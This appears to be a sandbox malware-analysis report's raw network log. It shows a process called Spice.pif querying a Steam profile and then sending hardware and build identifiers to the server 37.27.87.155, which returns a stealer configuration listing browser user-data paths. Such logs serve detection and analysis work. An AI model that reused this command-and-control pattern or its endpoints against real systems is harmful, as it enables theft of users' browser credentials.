                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.040613890 CEST4434972437.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.040633917 CEST4434972437.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.040883064 CEST49724443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.040914059 CEST4434972437.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.040961027 CEST49724443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.144382954 CEST4434972437.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.144403934 CEST4434972437.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.144620895 CEST49724443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.144639969 CEST4434972437.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.144681931 CEST49724443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.207607985 CEST4434972437.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.207660913 CEST4434972437.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.207690954 CEST4434972437.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.207732916 CEST49724443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.207802057 CEST49724443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.208597898 CEST49724443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.208616972 CEST4434972437.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.600188017 CEST49725443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.600238085 CEST4434972537.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.600315094 CEST49725443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.600723028 CEST49725443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:26.600737095 CEST4434972537.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.042618036 CEST4434972537.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.042746067 CEST49725443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.043370008 CEST49725443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.043382883 CEST4434972537.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.043524027 CEST49725443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.043529987 CEST4434972537.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.916167974 CEST4434972537.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.916210890 CEST4434972537.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.916269064 CEST49725443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.916290998 CEST4434972537.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.916302919 CEST49725443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.916305065 CEST4434972537.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.916336060 CEST49725443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.916363001 CEST49725443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.916680098 CEST49725443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.916695118 CEST4434972537.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.919833899 CEST49726443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.919888020 CEST4434972637.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.919975042 CEST49726443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.920368910 CEST49726443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:27.920386076 CEST4434972637.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:28.359543085 CEST4434972637.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:28.359636068 CEST49726443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:28.360168934 CEST49726443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:28.360198021 CEST4434972637.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:28.360368013 CEST49726443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:28.360382080 CEST4434972637.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:29.228868008 CEST4434972637.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:29.228889942 CEST4434972637.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:29.228949070 CEST4434972637.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:29.228965044 CEST49726443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:29.228991032 CEST49726443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:29.229017973 CEST49726443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:29.573267937 CEST49726443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:29.573304892 CEST4434972637.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:31.857549906 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:31.857599974 CEST4434972737.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:31.857688904 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:31.857950926 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:31.857964039 CEST4434972737.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.297856092 CEST4434972737.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.297966003 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.298651934 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.298667908 CEST4434972737.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.298834085 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.298839092 CEST4434972737.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.298897982 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.298911095 CEST4434972737.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.298985958 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.299006939 CEST4434972737.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.299074888 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.299089909 CEST4434972737.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.861943007 CEST49728443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.861975908 CEST4434972837.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.862185001 CEST49728443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.862411976 CEST49728443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:32.862421989 CEST4434972837.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.304912090 CEST4434972837.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.307157040 CEST49728443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.307737112 CEST49728443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.307750940 CEST4434972837.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.308007002 CEST49728443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.308007002 CEST49728443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.308016062 CEST4434972837.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.308027983 CEST4434972837.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.724056005 CEST4434972737.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.724148035 CEST4434972737.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.724184036 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.724240065 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.725356102 CEST49727443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.725379944 CEST4434972737.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.898013115 CEST49729443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.898067951 CEST4434972937.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.898148060 CEST49729443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.898428917 CEST49729443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:33.898443937 CEST4434972937.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:34.294730902 CEST4434972837.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:34.294806957 CEST4434972837.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:34.294833899 CEST49728443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:34.294848919 CEST49728443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:34.340234041 CEST4434972937.27.87.155192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:44:34.340327024 CEST49729443192.168.2.837.27.87.155
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Apr 30, 2024 07:42:33.528533936 CEST5915753192.168.2.81.1.1.1
                                                                                                                                                                                                                                    Apr 30, 2024 07:42:33.677962065 CEST53591571.1.1.1192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:52.938895941 CEST5991753192.168.2.81.1.1.1
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.041352987 CEST53599171.1.1.1192.168.2.8
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Apr 30, 2024 07:42:33.528533936 CEST192.168.2.81.1.1.10xb8cdStandard query (0)ihIVTwGgMFMSkvPLDBTLteOUVB.ihIVTwGgMFMSkvPLDBTLteOUVBA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:52.938895941 CEST192.168.2.81.1.1.10xc7ecStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Apr 30, 2024 07:42:33.677962065 CEST1.1.1.1192.168.2.80xb8cdName error (3)ihIVTwGgMFMSkvPLDBTLteOUVB.ihIVTwGgMFMSkvPLDBTLteOUVBnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.041352987 CEST1.1.1.1192.168.2.80xc7ecNo error (0)steamcommunity.com23.7.115.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                                    • 37.27.87.155
                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.84970923.7.115.52443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:43:53 UTC119OUTGET /profiles/76561199677575543 HTTP/1.1
                                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:43:53 UTC1882INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:43:53 GMT
                                                                                                                                                                                                                                    Content-Length: 34667
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: sessionid=84fd87eb03becf16119275aa; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7C23bec3383ae3c73676393b741a4cd362; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                    2024-04-30 05:43:53 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                    2024-04-30 05:43:53 UTC10074INData Raw: 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 69 6e 73 74 61 6c 6c 73 74 65 61 6d 5f 62 74 6e 20 68 65 61 64 65 72
                                                                                                                                                                                                                                    Data Ascii: ent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Menu"><a class="header_installsteam_btn header
                                                                                                                                                                                                                                    2024-04-30 05:43:53 UTC10091INData Raw: 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 70 75 62 6c 69 63 5c 2f 73 68 61 72 65 64 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 48 41 54 5f 42 41 53 45 5f 55 52 4c 26 71 75
                                                                                                                                                                                                                                    Data Ascii: ;https:\/\/store.cloudflare.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quot;:&quot;https:\/\/community.cloudflare.steamstatic.com\/public\/shared\/&quot;,&quot;COMMUNITY_BASE_URL&quot;:&quot;https:\/\/steamcommunity.com\/&quot;,&quot;CHAT_BASE_URL&qu


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    1192.168.2.84971037.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:43:54 UTC169OUTGET / HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:43:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:43:55 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:43:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    2192.168.2.84971137.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:43:55 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Content-Length: 278
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:43:55 UTC278OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 39 36 42 37 39 34 41 41 30 42 36 31 32 33 33 31 37 34 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 41
                                                                                                                                                                                                                                    Data Ascii: ------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="hwid"AE96B794AA0B612331747-a33c7340-61ca-11ee-8c18-806e6f6e6963------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------A
                                                                                                                                                                                                                                    2024-04-30 05:43:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:43:56 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:43:56 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 3a1|1|1|1|52fb76e376ae1d7de05801a3ed56b5bd|1|0|1|1|0|50000|00


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    3192.168.2.84971237.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:43:58 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIE
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:43:58 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------IJEHIDHDAKJDHJKEBFIECont
                                                                                                                                                                                                                                    2024-04-30 05:43:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:43:58 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:43:58 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                    Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    4192.168.2.84971337.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:43:59 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJK
